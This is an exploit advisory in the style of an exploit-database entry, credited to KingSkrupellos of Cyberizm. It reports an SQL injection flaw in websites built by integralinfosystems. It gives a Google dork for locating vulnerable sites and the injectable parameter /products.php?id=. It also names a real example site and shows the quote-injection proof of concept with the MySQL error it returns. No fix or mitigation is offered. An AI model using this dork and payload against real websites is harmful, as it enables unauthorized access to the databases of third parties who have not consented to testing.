################################################################################################# # Exploit Title : Website Designed and Developed By integralinfosystems England SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 12/09/2018 # Vendor Homepage : integralinfosystems.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Website Designed and Developed By integralinfosystems'' # Exploit : /products.php?id=[SQL Injection] ################################################################################################# # Example Site => supereqsystems.com/products.php?id=6%27 => [ Proof of Concept ] => archive.is/XbzxS # SQL Database Error => An Internal Error has Occured. Please report following error to the webmaster. select * from tbl_product where id=6\' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1' ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################